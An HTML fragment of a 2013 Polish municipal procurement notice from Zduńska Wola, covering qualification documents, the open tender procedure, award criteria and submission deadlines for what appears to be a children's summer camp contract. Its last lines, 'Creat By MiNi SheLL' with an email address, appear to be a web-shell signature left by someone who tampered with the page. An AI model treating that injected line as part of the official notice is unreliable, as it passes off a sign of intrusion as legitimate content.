<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - standart i położenie ośrodka - 20</li>
<li>3 - program ramowy kolonii - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdunskawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zduńska Wola
ul. S. Złotnickiego 12
98-220 Zduńska Wola
Biuro Programów Zdrowotnych i Spraw Społecznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2013 godzina 11:00, miejsce: Urząd Miasta Zduńska Wola
ul. S. Złotnickiego 12
98-220 Zduńska Wola
Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com